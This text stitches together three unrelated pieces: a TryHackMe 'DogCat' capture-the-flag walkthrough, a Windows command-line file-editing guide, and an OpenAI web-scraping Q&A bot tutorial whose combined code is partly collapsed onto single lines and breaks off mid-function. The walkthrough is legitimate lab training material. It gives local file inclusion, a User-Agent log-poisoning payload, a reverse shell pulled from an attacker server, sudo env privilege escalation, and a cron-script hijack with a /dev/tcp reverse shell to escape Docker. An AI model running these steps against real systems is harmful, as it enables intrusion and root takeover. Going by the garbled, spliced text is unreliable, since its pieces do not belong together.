
TryHackMe DogCat Walkthrough [+ Easy Video]


CHALLENGE OVERVIEW

YouTube Video
  • Link: THM Dogcat
  • Difficulty: Medium
  • Target: Flags 1-4
  • Highlight: intercepting and modifying a web request using Burp Suite
  • Tools used: base64, Burp Suite
  • Tags: docker, directory traversal

BACKGROUND

In this tutorial, we will walk through a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a Docker container to capture the 4th and final flag.

ENUMERATION/RECON

export target=10.10.148.135
export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to base64-encode the file contents and output the raw base64 string.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decode the string and view the raw source.
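If you prefer to stay in one tool, the same round trip can be done in Python (a sketch; only the first few characters of the captured blob are shown here):

```python
import base64

# The first few characters of the blob captured above -- in practice,
# paste the entire base64 string into `encoded`
encoded = "PCFET0NUWVBFIEhUTUw+"

decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)  # -> <!DOCTYPE HTML>
```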

Reading over this source code, we can see that the file extension can be set!

If the user doesn’t specify an extension, the default is .php. This means we can append “&ext=” to the end of our web address to prevent the .php extension from being added.

For the backend to include our file, the view parameter must contain the word “dog” or “cat”.
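Putting both constraints together — a mandatory “dog”/“cat” keyword plus the empty-extension trick — a traversal URL can be built like this (a sketch; /etc/passwd is just a harmless test target):

```python
target = "http://10.10.148.135"

# "dog/../" satisfies the keyword check but immediately steps back out
# of the images directory; the trailing "&ext=" makes the backend
# append an empty extension instead of the default ".php"
url = target + "/?view=dog/../../../../etc/passwd&ext="
print(url)
```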

Let’s dive in with Burp Suite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

  1. Create a PHP reverse shell
  2. Start up our netcat listener
  3. Use Burp to intercept and modify the web request. Wait until step 5 to click “Forward”.
  4. Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
  5. Click “forward” on burp to send the web request.
  6. Activate the shell by entering http://$target/bshell.php in the browser address bar
  7. Catch the revshell on netcat!

STEP 1

Let’s create a Pentest Monkey PHP reverse shell (shell.php).

STEP 2

Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3

Intercept the web request that includes the Apache2 log, and modify the User-Agent field with PHP code that requests shell.php from our machine and saves it as bshell.php on the target.

This works because, upon examining the Apache2 logs, we noticed that the User-Agent field is written to the log unencoded, so any PHP placed there gets executed when the log file is included. Make sure to wait to click “Forward” until step 5.
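The User-Agent payload can be drafted ahead of time. The snippet below is only a sketch of the idea; the filename bshell.php, the port 8000, and the log path are our choices for this walkthrough, not fixed by the box:

```python
my_ip = "10.6.2.23"  # attacker IP (myIP from the recon step)

# PHP that, once written into access.log and included via the LFI,
# downloads shell.php from our HTTP server and saves it as bshell.php
payload = (
    "<?php file_put_contents('bshell.php', "
    f"file_get_contents('http://{my_ip}:8000/shell.php')); ?>"
)
print(payload)

# In Burp, this string replaces the User-Agent header; the log is then
# pulled in with ?view=dog/../../../../var/log/apache2/access.log&ext=
```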

STEP 4

We’ll spin up a simple Python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in Burp Suite.

STEP 5

Click “Forward” in Burp and check whether a 200 response for shell.php came through on the HTTP server.

STEP 6

We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7

We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt
<?php
$flag_1 = "THM{Th...omitted...fa}"
?>

LOCAL RECON

LOCATE THE SECOND FLAG

We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

The find command lets us quickly scan the filesystem for any files whose names contain the word “flag”.

find / -type f -name '*flag*' 2>/dev/null

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LF...omitted...fb}

CHECK SUDO PERMISSIONS

Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 26e23794a52b:
    (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION

Because we have passwordless sudo permissions on the env binary, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG 

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1...omitted...12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that runs regularly on a schedule via cronjobs. We can hijack this file, which is run by root outside of the Docker container, by changing its contents to throw a revshell.

echo '#!/bin/bash' > backup.sh
echo 'bash -i >& /dev/tcp/10.6.2.23/3333 0>&1' >> backup.sh

When the cronjob fires, our listener on port 3333 catches a root shell on the host, outside the container:

ls
flag4.txt
cat flag4.txt
THM{esc...omitted...2d}

FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal, combined with a php:// filter to base64-encode file contents, was also a cool way to evade the data sanitization measures in place on the backend.


5 Easy Ways to Edit a Text File From Command Line (Windows)


Problem Formulation

Given a text file, say my_file.txt, in your working directory. How can you modify its contents from the Windows command line?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad

The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe suffix in most cases:

notepad my_text_file.txt

Now, you may ask:

💡 Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:

When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach

If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

  • Run the command echo 'your new content' > my_file.txt to print the new content using echo and redirect the output into the text file my_file.txt using >.
  • Check the new content using the command type my_file.txt.
C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt
C:\Users\xcent\Desktop>type my_file.txt
'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world':

This is a simple and straightforward approach for small changes. However, if you have a large file and just want to edit some minor details, it is not the best way.
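For that case, if Python happens to be installed (it isn’t part of a stock Windows install, but is common), a short script can patch just the detail you care about; the file name and contents below are made up for the demo:

```python
# A sketch for minor in-place edits, assuming Python is available
from pathlib import Path

path = Path("my_file.txt")
path.write_text("line one\nline two\nline three\n")  # demo setup

# Read the whole file, change one detail, write it back
text = path.read_text()
path.write_text(text.replace("line two", "LINE TWO"))

print(path.read_text())
```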

Method 3: Change File Purely In CMD (Copy Con)

If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method! 👇

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:

A couple of notes:

💡 Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine

Of course, if you’re logged in to a Unix-based machine, you don’t need to install any editor because such systems come with powerful integrated editors such as vim or emacs.

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary

To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD approach, run copy con file.txt to write the file contents directly in the terminal.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.


👉 Recommended: How to Edit a Text File in PowerShell (Windows)


Building a Q&A Bot with OpenAI: A Step-by-Step Guide to Scraping Websites and Answering Questions


Have you ever found yourself deep in the internet rabbit hole, searching for an answer to a question that just won’t quit?

It can be frustrating to sift through all the online information and still come up empty-handed. But what if there was a way to get accurate and reliable answers in a snap? Enter the Q&A bot – your new best friend for all your pressing questions!

✅ In this blog, we will take you on a wild ride to show you how to build your very own Q&A bot using OpenAI’s language models. We’ll guide you through the process of scraping text from a website, processing it, and using OpenAI’s language models to find the answers you seek.

And let’s face it, who doesn’t love having a robot friend that can answer all their burning questions? So buckle up and let’s build a quirky, lovable Q&A bot together!

You can check out the whole code project on GitHub (OpenAI cookbook). I’ll explain the steps in the following sections.

Overview

This tutorial presents a Python script that

  • crawls a website,
  • extracts the text from the webpages,
  • tokenizes the text, and
  • creates embeddings for each text (quick explanation on “embeddings” below).

It then uses OpenAI’s API to answer questions based on the embeddings of the text.
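Before diving in, here’s a toy illustration of what an “embedding” is: each text becomes a vector of numbers, and texts with similar meaning get vectors pointing in similar directions. The numbers below are made up; real embeddings come from the API in Step 10 and have 1536 dimensions:

```python
import math

# Made-up 3-dimensional "embeddings" for three words
dog   = [0.9, 0.1, 0.0]
puppy = [0.8, 0.2, 0.1]
car   = [0.0, 0.2, 0.9]

def cosine_sim(a, b):
    """Cosine similarity: close to 1 = similar direction, close to 0 = unrelated."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = lambda v: math.sqrt(sum(x * x for x in v))
    return dot / (norm(a) * norm(b))

print(cosine_sim(dog, puppy))  # high -- similar meaning
print(cosine_sim(dog, car))    # low  -- unrelated
```

This distance-in-vector-space idea is exactly what `distances_from_embeddings` computes in Step 12 to pick the most relevant context for a question.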

You will need to create your own API key if you want to try it yourself.

👉 Recommended: OpenAI API – or How I Made My Python Code Intelligent

You should also install the openai library — I’ve written a blog tutorial on this too:

👉 Recommended: How to Install OpenAI in Python?

Scroll down to the whole code section if you want to try it by copy&paste.

Step 1

This section of the code imports the necessary Python libraries for the script, including requests for sending HTTP requests, re for regular expressions, urllib.request for opening URLs, BeautifulSoup for parsing HTML and XML, deque for creating a queue, HTMLParser for parsing HTML, urlparse for parsing URLs, os for interacting with the operating system, pandas for working with dataframes, tiktoken for getting a tokenizer, and openai for creating embeddings and answering questions.

################################################################################
### Step 1
################################################################################

import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity

# Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+'

# Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/"

# Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser):
    def __init__(self):
        super().__init__()
        # Create a list to store the hyperlinks
        self.hyperlinks = []

    # Override the HTMLParser's handle_starttag method to get the hyperlinks
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)

        # If the tag is an anchor tag and it has an href attribute,
        # add the href attribute to the list of hyperlinks
        if tag == "a" and "href" in attrs:
            self.hyperlinks.append(attrs["href"])

Step 2

This section of the code defines a function called get_hyperlinks that takes a URL as input, tries to open the URL and read the HTML, and then parses the HTML to get hyperlinks. If the response is not HTML, it returns an empty list.

################################################################################
### Step 2
################################################################################

# Function to get the hyperlinks from a URL
def get_hyperlinks(url):
    # Try to open the URL and read the HTML
    try:
        # Open the URL and read the HTML
        with urllib.request.urlopen(url) as response:
            # If the response is not HTML, return an empty list
            if not response.info().get('Content-Type').startswith("text/html"):
                return []
            # Decode the HTML
            html = response.read().decode('utf-8')
    except Exception as e:
        print(e)
        return []

    # Create the HTML Parser and then parse the HTML to get hyperlinks
    parser = HyperlinkParser()
    parser.feed(html)
    return parser.hyperlinks

Step 3

This section of the code defines a function called get_domain_hyperlinks that takes a domain and a URL as input and returns a list of hyperlinks from the URL that are within the same domain. If the hyperlink is a URL, it checks if it is within the same domain. If the hyperlink is not a URL, it checks if it is a relative link.

################################################################################
### Step 3
################################################################################

# Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url):
    clean_links = []
    for link in set(get_hyperlinks(url)):
        clean_link = None

        # If the link is a URL, check if it is within the same domain
        if re.search(HTTP_URL_PATTERN, link):
            # Parse the URL and check if the domain is the same
            url_obj = urlparse(link)
            if url_obj.netloc == local_domain:
                clean_link = link

        # If the link is not a URL, check if it is a relative link
        else:
            if link.startswith("/"):
                link = link[1:]
            elif link.startswith("#") or link.startswith("mailto:"):
                continue
            clean_link = "https://" + local_domain + "/" + link

        if clean_link is not None:
            if clean_link.endswith("/"):
                clean_link = clean_link[:-1]
            clean_links.append(clean_link)

    # Return the list of hyperlinks that are within the same domain
    return list(set(clean_links))

Step 4

This section of the code defines a function called crawl that takes a URL as input, parses the URL to get the domain, creates a queue to store the URLs to crawl, creates a set to store the URLs that have already been seen (no duplicates), and creates a directory to store the text files. It then continues crawling until the queue is empty, saving the text from each URL to a text file, and getting the hyperlinks from each URL and adding them to the queue.

################################################################################
### Step 4
################################################################################

def crawl(url):
    # Parse the URL and get the domain
    local_domain = urlparse(url).netloc

    # Create a queue to store the URLs to crawl
    queue = deque([url])

    # Create a set to store the URLs that have already been seen (no duplicates)
    seen = set([url])

    # Create a directory to store the text files
    if not os.path.exists("text/"):
        os.mkdir("text/")
    if not os.path.exists("text/" + local_domain + "/"):
        os.mkdir("text/" + local_domain + "/")

    # Create a directory to store the csv files
    if not os.path.exists("processed"):
        os.mkdir("processed")

    # While the queue is not empty, continue crawling
    while queue:
        # Get the next URL from the queue
        url = queue.pop()
        print(url)  # for debugging and to see the progress

        # Save text from the url to a <url>.txt file
        with open('text/' + local_domain + '/' + url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f:
            # Get the text from the URL using BeautifulSoup
            soup = BeautifulSoup(requests.get(url).text, "html.parser")

            # Get the text but remove the tags
            text = soup.get_text()

            # If the crawler gets to a page that requires JavaScript, it will stop the crawl
            if "You need to enable JavaScript to run this app." in text:
                print("Unable to parse page " + url + " due to JavaScript being required")

            # Otherwise, write the text to the file in the text directory
            f.write(text)

        # Get the hyperlinks from the URL and add them to the queue
        for link in get_domain_hyperlinks(local_domain, url):
            if link not in seen:
                queue.append(link)
                seen.add(link)

crawl(full_url)

Step 5

This section of the code defines a function called remove_newlines that takes a pandas Series object as input, replaces newlines with spaces, and returns the modified Series.

################################################################################
### Step 5
################################################################################

def remove_newlines(serie):
    serie = serie.str.replace('\n', ' ')
    serie = serie.str.replace('\\n', ' ')
    serie = serie.str.replace('  ', ' ')
    serie = serie.str.replace('  ', ' ')
    return serie

Step 6

This section of the code creates a list called texts to store the text files, gets all the text files in the text directory, opens each file, reads the text, strips the first 11 and last 4 characters from the filename, replaces -, _, and #update with spaces, and appends the cleaned name together with the text to the list of texts. It then creates a dataframe from the list of texts, sets the text column to be the raw text with the newlines removed, and saves the dataframe as a CSV file.

################################################################################
### Step 6
################################################################################

# Create a list to store the text files
texts = []

# Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"):

    # Open the file and read the text
    with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f:
        text = f.read()

        # Strip the first 11 and last 4 characters of the filename,
        # then replace -, _, and #update with spaces
        texts.append((file[11:-4].replace('-', ' ').replace('_', ' ').replace('#update', ''), text))

# Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns=['fname', 'text'])

# Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

Step 7

This section of the code loads a tokenizer and applies it to the text column of the dataframe to get the number of tokens for each row. It then creates a histogram of the number of tokens per row.

################################################################################
### Step 7
################################################################################

# Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base")

df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text']

# Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))

# Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

Step 8

This section of the code defines a maximum number of tokens, creates a function called split_into_many that takes text and a maximum number of tokens as input and splits the text into chunks of a maximum number of tokens.

It then loops through the dataframe and either adds the text to the list of shortened texts or splits the text into chunks of a maximum number of tokens and adds the chunks to the list of shortened texts.

################################################################################
### Step 8
################################################################################

max_tokens = 500

# Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens=max_tokens):
    # Split the text into sentences
    sentences = text.split('. ')

    # Get the number of tokens for each sentence
    n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences]

    chunks = []
    tokens_so_far = 0
    chunk = []

    # Loop through the sentences and tokens joined together in a tuple
    for sentence, token in zip(sentences, n_tokens):

        # If the number of tokens so far plus the number of tokens in the current sentence is greater
        # than the max number of tokens, then add the chunk to the list of chunks and reset
        # the chunk and tokens so far
        if tokens_so_far + token > max_tokens:
            chunks.append(". ".join(chunk) + ".")
            chunk = []
            tokens_so_far = 0

        # If the number of tokens in the current sentence is greater than the max number of
        # tokens, go to the next sentence
        if token > max_tokens:
            continue

        # Otherwise, add the sentence to the chunk and add the number of tokens to the total
        chunk.append(sentence)
        tokens_so_far += token + 1

    return chunks

shortened = []

# Loop through the dataframe
for row in df.iterrows():

    # If the text is None, go to the next row
    if row[1]['text'] is None:
        continue

    # If the number of tokens is greater than the max number of tokens, split the text into chunks
    if row[1]['n_tokens'] > max_tokens:
        shortened += split_into_many(row[1]['text'])

    # Otherwise, add the text to the list of shortened texts
    else:
        shortened.append(row[1]['text'])

Step 9

This section of the code creates a new dataframe from the list of shortened texts, applies the tokenizer to the text column of the dataframe to get the number of tokens for each row, and creates a histogram of the number of tokens per row.

################################################################################
### Step 9
################################################################################

df = pd.DataFrame(shortened, columns=['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

Step 10

Step 10 involves using OpenAI’s language model to embed the text into vectors. This allows the model to analyze the text and make predictions based on its content. The openai.Embedding.create() function is used to create the embeddings, and they are saved in a new column in the DataFrame.

################################################################################
### Step 10
################################################################################

# Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this:
# https://platform.openai.com/docs/guides/rate-limits

df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

Step 11

Step 11 involves loading the embeddings from the DataFrame and converting them to numpy arrays.

################################################################################
### Step 11
################################################################################

df = pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array)

df.head()

Step 12

Step 12 includes the create_context() and answer_question() functions that use the embeddings to find the most similar context to a question and then answer it based on that context. These functions leverage OpenAI’s language models and the embeddings created in Step 10 to provide accurate and reliable answers. The create_context() function creates the context based on the question and the embeddings, while the answer_question() function uses the context and question to generate a response using OpenAI’s GPT-3 language model.

################################################################################
### Step 12
################################################################################

def create_context(question, df, max_len=1800, size="ada"):
    """
    Create a context for a question by finding the most similar context from the dataframe
    """

    # Get the embeddings for the question
    q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding']

    # Get the distances from the embeddings
    df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine')

    returns = []
    cur_len = 0

    # Sort by distance and add the text to the context until the context is too long
    for i, row in df.sort_values('distances', ascending=True).iterrows():

        # Add the length of the text to the current length
        cur_len += row['n_tokens'] + 4

        # If the context is too long, break
        if cur_len > max_len:
            break

        # Else add it to the text that is being returned
        returns.append(row["text"])

    # Return the context
    return "\n\n###\n\n".join(returns)


def answer_question(
    df,
    model="text-davinci-003",
    question="Am I allowed to publish model outputs to Twitter, without a human review?",
    max_len=1800,
    size="ada",
    debug=False,
    max_tokens=150,
    stop_sequence=None
):
    """
    Answer a question based on the most similar context from the dataframe texts
    """
    context = create_context(question, df, max_len=max_len, size=size)

    # If debug, print the raw model response
    if debug:
        print("Context:\n" + context)
        print("\n\n")

    try:
        # Create a completion using the question and context
        response = openai.Completion.create(
            prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:",
            temperature=0,
            max_tokens=max_tokens,
            top_p=1,
            frequency_penalty=0,
            presence_penalty=0,
            stop=stop_sequence,
            model=model,
        )
        return response["choices"][0]["text"].strip()
    except Exception as e:
        print(e)
        return ""

Step 13

Step 13 provides an example of using the answer_question() function to answer two different questions. The first question is a simple one, while the second question requires more specific knowledge. This example demonstrates the versatility of the Q&A bot and its ability to answer a wide range of questions.

################################################################################
### Step 13
################################################################################

print(answer_question(df, question="What day is it?", debug=False))

print(answer_question(df, question="What is our newest embeddings model?"))

Putting It All Together

You can check out the whole code project on GitHub or simply copy and paste it from here:

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"]) ################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks ################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links)) ################################################################################
### Step 4
################################################################################

def crawl(url):
    # Parse the URL and get the domain
    local_domain = urlparse(url).netloc

    # Create a queue to store the URLs to crawl
    queue = deque([url])

    # Create a set to store the URLs that have already been seen (no duplicates)
    seen = set([url])

    # Create a directory to store the text files
    if not os.path.exists("text/"):
        os.mkdir("text/")

    if not os.path.exists("text/" + local_domain + "/"):
        os.mkdir("text/" + local_domain + "/")

    # Create a directory to store the csv files
    if not os.path.exists("processed"):
        os.mkdir("processed")

    # While the queue is not empty, continue crawling
    while queue:
        # Get the next URL from the queue
        url = queue.pop()
        print(url)  # for debugging and to see the progress

        # Save text from the url to a <url>.txt file
        with open('text/' + local_domain + '/' + url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f:
            # Get the text from the URL using BeautifulSoup
            soup = BeautifulSoup(requests.get(url).text, "html.parser")

            # Get the text but remove the tags
            text = soup.get_text()

            # If the crawler gets to a page that requires JavaScript, it will stop the crawl
            if "You need to enable JavaScript to run this app." in text:
                print("Unable to parse page " + url + " due to JavaScript being required")

            # Otherwise, write the text to the file in the text directory
            f.write(text)

        # Get the hyperlinks from the URL and add them to the queue
        for link in get_domain_hyperlinks(local_domain, url):
            if link not in seen:
                queue.append(link)
                seen.add(link)

crawl(full_url)

################################################################################
### Step 5
################################################################################

def remove_newlines(serie):
    serie = serie.str.replace('\n', ' ')
    serie = serie.str.replace('\\n', ' ')
    serie = serie.str.replace('  ', ' ')
    serie = serie.str.replace('  ', ' ')
    return serie

################################################################################
### Step 6
################################################################################

# Create a list to store the text files
texts = []

# Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"):
    # Open the file and read the text
    with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f:
        text = f.read()

        # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces.
        texts.append((file[11:-4].replace('-', ' ').replace('_', ' ').replace('#update', ''), text))

# Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns=['fname', 'text'])

# Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

################################################################################
### Step 7
################################################################################

# Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base")

df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text']

# Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))

# Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

################################################################################
### Step 8
################################################################################

max_tokens = 500

# Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens=max_tokens):
    # Split the text into sentences
    sentences = text.split('. ')

    # Get the number of tokens for each sentence
    n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences]

    chunks = []
    tokens_so_far = 0
    chunk = []

    # Loop through the sentences and tokens joined together in a tuple
    for sentence, token in zip(sentences, n_tokens):
        # If the number of tokens so far plus the number of tokens in the current sentence is greater
        # than the max number of tokens, then add the chunk to the list of chunks and reset
        # the chunk and tokens so far
        if tokens_so_far + token > max_tokens:
            chunks.append(". ".join(chunk) + ".")
            chunk = []
            tokens_so_far = 0

